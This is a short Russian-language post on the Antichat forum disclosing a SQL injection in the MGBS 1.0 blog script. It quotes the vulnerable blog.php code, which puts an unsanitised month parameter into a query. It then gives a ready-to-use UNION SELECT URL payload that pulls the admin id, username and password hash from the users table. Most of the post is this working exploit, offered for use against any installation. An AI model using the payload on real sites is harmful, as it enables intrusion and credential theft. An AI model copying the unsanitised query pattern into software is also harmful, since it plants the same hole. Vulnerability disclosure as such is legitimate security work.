Форум АНТИЧАТ - MGBS 1.0 Remote SQL injection

Скрипт блога MGBS содержит багу типа sql injection. Уязвим сценарий blog.php:

PHP код:


		
			
<?php

   $month = $_GET['month'];

   $result = mysql_query("SELECT * FROM blog WHERE posted='$month' ORDER BY id DESC") or die("HELP QUERY BROKEN");

   ...

md5 хеш админа

Код:

http://[target]/[path]/blog.php?month='+union+select+1,2,3,4,5,concat_ws(0x3a,id,uname,upass),7,8+from+users/*

Бага найдена мной вчера и опубликована на милворме